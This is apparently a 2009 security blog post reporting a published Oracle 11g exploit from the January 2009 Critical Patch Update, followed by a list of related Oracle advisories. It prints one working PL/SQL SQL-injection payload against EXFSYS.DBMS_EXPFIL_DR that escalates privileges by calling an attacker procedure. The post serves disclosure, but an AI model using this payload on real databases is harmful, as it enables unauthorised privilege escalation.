Exploit for January CPU 2009 published

Alexandr Polyakov, an Oracle security expert from Russia (reported findings in CPUJan2008, CPUJul2008 ), has posted details from one of his Oracle 11g findings on the webpage of dsecrg.com. 

By using the following PLSQL fragment

exec EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS(’EXFSYS’,'EXF$VERSION’,'EXFVER
SION’,'YYYYYYY” and 1=EVILPROC()–’)

it is possible to  escalate privileges via SQL Injection. More details (e.g. extract from v$sql) can be found in their advisory.

Other advisories for the January 2009 CPU cover other Oracle Products like BEA Application Server, Oracle E-Business Suite and

• Oracle EBusiness Suite Sensitive Information Disclosure Vulnerability
• Oracle Containers For Java Directory Traversal (OC4J) Oracle Application Server 10g (10.1.3.1.0) Oracle HTTP Server
•  Oracle BEA Weblogic 10 - Multiple Linked XSS vulnerabilities 
• Oracle Application Server (SOA) - Linked XSS vulnerability 

Dieser Eintrag wurde am 21 Jan 2009 um 20:50 verfasst und befindet sich in Oracle Security. Sie können alle Antworten zu diesem Eintrag über den Feed RSS 2.0 mitverfolgen. Hinterlassen Sie eine Antwort oder einen Trackback-Link zu Ihrer eigenen Homepage.

| Drucken